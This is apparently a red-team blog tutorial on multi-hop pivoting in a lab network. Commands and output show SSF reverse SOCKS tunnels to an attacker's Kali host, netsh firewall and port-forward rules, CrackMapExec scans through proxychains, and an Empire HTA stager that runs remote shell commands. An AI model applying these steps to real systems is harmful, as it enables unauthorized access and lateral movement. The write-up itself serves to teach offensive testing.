Solving double/n hop with ssf - SOCKS/C2 Follow @mpgn_x64
My solution to solve multiple hop using SSF. First we start with three servers, imagine we want to reach the Server 3 (192.168.152.102) from our Kali (192.168.133.156). We need to setup a socks tunnel between Server 2 and our kali. We also want to execute an Empire agent on Server 2. Let's solve this situation !
Note: You need to have local administrator privilege on Server 1 in order to allow connection on port 5000 if the firewall is enabled !
Creating a remote SOCKS between Server 1 and Kali
.png)
First we start an 'ssf' server on Kali:
┌──(mpgn㉿kali)-[~/ssf-linux-x86_64-3.0.0]
└─$ sudo ./ssfd -p 1337
[2021-03-02T08:12:02-05:00] [info] [config] [tls] CA cert path:
[2021-03-02T08:12:02-05:00] [info] [config] [tls] cert path:
[2021-03-02T08:12:02-05:00] [info] [config] [tls] key path:
[2021-03-02T08:12:02-05:00] [info] [config] [tls] key password: <>
[2021-03-02T08:12:02-05:00] [info] [config] [tls] dh path:
[2021-03-02T08:12:02-05:00] [info] [config] [tls] cipher suite:
[2021-03-02T08:12:02-05:00] [info] [config] [http proxy]
[2021-03-02T08:12:02-05:00] [info] [config] [socks proxy]
[2021-03-02T08:12:02-05:00] [info] [config] [circuit]
[2021-03-02T08:12:02-05:00] [info] [ssfd] listening on <*:1337>
[2021-03-02T08:12:02-05:00] [info] [ssfd] running (Ctrl + C to stop)
On Server 1 we use ssf to open a remote socks and connect it to our ssfd server (on kali). We use the option -F port to open a remote socks.
C:\Users\harry\Desktop\ssf-win-x86_64-3.0.0\ssf-win-x86_64-3.0.0>.\ssf.exe -F 1080 -p 1337 192.168.133.156
[2021-02-28T12:37:19-08:00] [info] [config] [tls] CA cert path:
[2021-02-28T12:37:19-08:00] [info] [config] [tls] cert path:
[2021-02-28T12:37:19-08:00] [info] [config] [tls] key path:
[2021-02-28T12:37:19-08:00] [info] [config] [tls] key password: <>
[2021-02-28T12:37:19-08:00] [info] [config] [tls] dh path:
[2021-02-28T12:37:19-08:00] [info] [config] [tls] cipher suite:
[2021-02-28T12:37:19-08:00] [info] [config] [http proxy]
[2021-02-28T12:37:19-08:00] [info] [config] [socks proxy]
[2021-02-28T12:37:19-08:00] [info] [config] [circuit]
[2021-02-28T12:37:19-08:00] [info] [ssf] connecting to <192.168.133.156:443>
[2021-02-28T12:37:19-08:00] [info] [ssf] running (Ctrl + C to stop)
[2021-02-28T12:37:19-08:00] [info] [client] connection attempt 1/1
[2021-02-28T12:37:19-08:00] [info] [client] connected to server
[2021-02-28T12:37:19-08:00] [info] [client] running
[2021-02-28T12:37:19-08:00] [info] [microservice] [socks]: start server on fiber port 1080
[2021-02-28T12:37:19-08:00] [info] [client] service OK
On our Kali, a line should appear on the server ssfd:
[2021-03-02T08:12:14-05:00] [info] [microservice] [stream_listener]: forward TCP connections from <127.0.0.1:1080> to 1080
Now using proxychains we can configure the socks proxy like this:
vim /etc/proxychains.conf
...
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080
And then we can use CrackMapExec to scan to Server 2
┌──(mpgn㉿kali)-[~]
└─$ proxychains crackmapexec smb 192.168.151.102
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.151.102:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.151.102:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.151.102:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.151.102:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 192.168.151.102:445 ... OK
SMB 192.168.151.102 445 DESKTOP-BQC6FMA [*] Windows 10.0 Build 19041 x64 (name:DESKTOP-BQC6FMA) (domain:poudlard.wizard) (signing:False) (SMBv1:False)
Note: No need to be local admin for this part of course.
Creating a remote SOCKS between Server 2 and Kali
.png)
Now let's open a socks between Server 2 and our Kali. First we open a ssf server on port 5000 on Server 1:
C:\Users\harry\Desktop\ssf-win-x86_64-3.0.0\ssf-win-x86_64-3.0.0>.\ssfd.exe -p 5000
[2021-03-02T02:23:25-08:00] [info] [config] [tls] CA cert path:
[2021-03-02T02:23:25-08:00] [info] [config] [tls] cert path:
[2021-03-02T02:23:25-08:00] [info] [config] [tls] key path:
[2021-03-02T02:23:25-08:00] [info] [config] [tls] key password: <>
[2021-03-02T02:23:25-08:00] [info] [config] [tls] dh path:
[2021-03-02T02:23:25-08:00] [info] [config] [tls] cipher suite:
[2021-03-02T02:23:25-08:00] [info] [config] [http proxy]
[2021-03-02T02:23:25-08:00] [info] [config] [socks proxy]
[2021-03-02T02:23:25-08:00] [info] [config] [circuit]
[2021-03-02T02:23:25-08:00] [info] [ssfd] listening on <*:5000>
[2021-03-02T02:23:25-08:00] [info] [ssfd] running (Ctrl + C to stop)
And then you need to allow connection to the port 5000 by adding this firewall rules if the firewall is enabled.
C:\Windows\system32>netsh advfirewall firewall add rule name="TCP Port 5000" dir=in action=allow protocol=TCP localport=5000
Ok.
You can argue on the fact that we can simple use the netsh command and port forward the port 1338 from Server 1 to our Kali, while this this true, you will always need administrative privileges even if the firewall is disabled. In our case, if the firewall is disabled we don't need administrative privileges anymore which can avoid to spend time to privesc on Server 1.
In any case, I'm currently using both option regarding the situation, so you can also use the following command netsh interface portproxy add v4tov4 listenport=1338 listenaddress=0.0.0.0 connectport=1338 connectaddress=192.168.133.156 and just reproduce the step 1 on Server 2.
Then we need to configure a path to tell ssf on Server 2 to use the port 5000 on Server 1 to connect to our Kali since our Kali is only reachable from Server 1. It's actually very simple, just add the following code in a file.
C:\Users\harry\Desktop\ssf-win-x86_64-3.0.0\ssf-win-x86_64-3.0.0>type config.txt
{
"ssf": {
"circuit": [
{"host": "192.168.151.101", "port":"5000"}
]
}
}
C:\Users\harry\Desktop\ssf-win-x86_64-3.0.0\ssf-win-x86_64-3.0.0>.\ssf.exe -F 1081 -c config.txt -p 1338 192.168.133.156
[2021-03-02T06:08:04-08:00] [info] [config] loading file
[2021-03-02T06:08:04-08:00] [info] [config] [tls] CA cert path:
[2021-03-02T06:08:04-08:00] [info] [config] [tls] cert path:
[2021-03-02T06:08:04-08:00] [info] [config] [tls] key path:
[2021-03-02T06:08:04-08:00] [info] [config] [tls] key password: <>
[2021-03-02T06:08:04-08:00] [info] [config] [tls] dh path:
[2021-03-02T06:08:04-08:00] [info] [config] [tls] cipher suite:
[2021-03-02T06:08:04-08:00] [info] [config] [http proxy]
[2021-03-02T06:08:04-08:00] [info] [config] [socks proxy]
[2021-03-02T06:08:04-08:00] [info] [config] [circuit] 1. <192.168.151.101:5000>
[2021-03-02T06:08:04-08:00] [info] [ssf] connecting to <192.168.133.156:1338>
[2021-03-02T06:08:04-08:00] [info] [ssf] running (Ctrl + C to stop)
[2021-03-02T06:08:04-08:00] [info] [client] connection attempt 1/1
[2021-03-02T06:08:04-08:00] [info] [client] connected to server
[2021-03-02T06:08:04-08:00] [info] [client] running
With the netsh solution just run .\ssf.exe -L 4443:192.168.133.156:4443 -p 1338 192.168.151.101 -F 1081
On our kali we should see this new line pop:
[2021-03-02T09:11:58-05:00] [info] [microservice] [stream_listener]: forward TCP connections from <127.0.0.1:1081> to 1081
Now copy the proxychains conf and modify it with port 1081 then we can target Server 3 without any problem using the proxy socks !
┌──(mpgn㉿kali)-[~]
└─$ copy /etc/proxychains.conf /tmp/proxychains-152.conf
┌──(mpgn㉿kali)-[~]
└─$ vim /tmp/proxychains-152.conf
...
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1081
┌──(mpgn㉿kali)-[~]
└─$ proxychains -f /tmp/proxychains-152.conf crackmapexec smb 192.168.152.102
[proxychains] config file found: /tmp/proxychains-152.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain ... 127.0.0.1:1081 ... 192.168.152.102:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1081 ... 192.168.152.102:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1081 ... 192.168.152.102:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:1081 ... 192.168.152.102:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:1081 ... 192.168.152.102:445 ... OK
SMB 192.168.152.102 445 MSEDGEWIN10 [*] Windows 10.0 Build 17763 x64 (name:MSEDGEWIN10) (domain:MSEDGEWIN10) (signing:False) (SMBv1:False)
Note: We could have close the first ssf connection made on first step (Server 1 to Kali).
Executing our Empire agent on Server 2
.png)
Now if you want to get your Empire agent running on Server 2 you need to create a new listener (notice the host 127.0.0.1)
(Empire: listeners) > uselistener http
(Empire: listeners/http) > info
HTTP[S] Options:
Name Required Value Description
---- -------- ------- -----------
Name True http1 Name for the listener.
Host True http://127.0.0.1:4443 Hostname/IP for staging.
BindIP True 0.0.0.0 The IP to bind to on the control server.
Port True 4443 Port for the listener.
.....
Then generate an agent ready to use on Empire and set the Listener to the previous one you created:
(Empire: agents) > usestager windows/hta
(Empire: stager/windows/hta) > info
Name: HTA
Description:
Generates an HTA (HyperText Application) For
Internet Explorer
Options:
Name Required Value Description
---- -------- ------- -----------
Listener True http1 Listener to generate stager for.
Language True powershell Language of the stager to generate.
Before executing our agent we need to kill our previous ssf connection on Server 2 and add some options to enable port forwarding
C:\Users\harry\Desktop\ssf-win-x86_64-3.0.0\ssf-win-x86_64-3.0.0>.\ssf.exe -c config.txt -L 4443:192.168.133.156:4443 -p 1338 192.168.133.156 -F 1081
[2021-03-02T06:36:22-08:00] [info] [config] loading file
[2021-03-02T06:36:22-08:00] [info] [config] [tls] CA cert path:
[2021-03-02T06:36:22-08:00] [info] [config] [tls] cert path:
[2021-03-02T06:36:22-08:00] [info] [config] [tls] key path:
[2021-03-02T06:36:22-08:00] [info] [config] [tls] key password: <>
[2021-03-02T06:36:22-08:00] [info] [config] [tls] dh path:
[2021-03-02T06:36:22-08:00] [info] [config] [tls] cipher suite:
[2021-03-02T06:36:22-08:00] [info] [config] [http proxy]
[2021-03-02T06:36:22-08:00] [info] [config] [socks proxy]
[2021-03-02T06:36:22-08:00] [info] [config] [circuit] 1. <192.168.151.101:5000>
[2021-03-02T06:36:22-08:00] [info] [ssf] connecting to <192.168.133.156:1338>
[2021-03-02T06:36:22-08:00] [info] [ssf] running (Ctrl + C to stop)
[2021-03-02T06:36:22-08:00] [info] [client] connection attempt 1/1
[2021-03-02T06:36:22-08:00] [info] [client] connected to server
[2021-03-02T06:36:22-08:00] [info] [client] running
[2021-03-02T06:36:22-08:00] [info] [microservice] [socks]: start server on fiber port 1081
[2021-03-02T06:36:22-08:00] [info] [client] service OK
[2021-03-02T06:36:22-08:00] [info] [microservice] [stream_listener]: forward TCP connections from <127.0.0.1:4443> to 4443
[2021-03-02T06:36:22-08:00] [info] [client] service OK
Now just run your stager on Server 2 and you should see the agent pop in Empire
[*] Sending POWERSHELL stager (stage 1) to 192.168.133.156
[*] New agent D816BHAY checked in
[+] Initial agent D816BHAY from 192.168.133.156 now active (Slack)
[*] Sending agent (stage 2) to D816BHAY at 192.168.133.156
(Empire: stager/windows/hta) > interact D816BHAY
(Empire: D816BHAY) > shell whoami
[*] Tasked D816BHAY to run TASK_SHELL
[*] Agent D816BHAY tasked with task ID 1
(Empire: D816BHAY) >
poudlard\harry
..Command execution completed.
(Empire: D816BHAY) > shell ipconfig
[*] Tasked D816BHAY to run TASK_SHELL
[*] Agent D816BHAY tasked with task ID 2
(Empire: D816BHAY) >
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.151.102
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.151.100
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.152.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.152.100
..Command execution completed.
(Empire: D816BHAY) >
Creating a remote SOCKS between server n and Kali
On each servers you need to run the command ssfd.exe -p 5000, you also need to open the port 5000 on the firewall to allow the connection meaning you need administrative privileges.
Then modify the config.txt file regarding your path, example if we want to setup a socks on Server 3, the config look like this:
{
"ssf": {
"circuit": [
{"host": "192.168.152.101", "port":"5000"},
{"host": "192.168.151.101", "port":"5000"}
]
}
}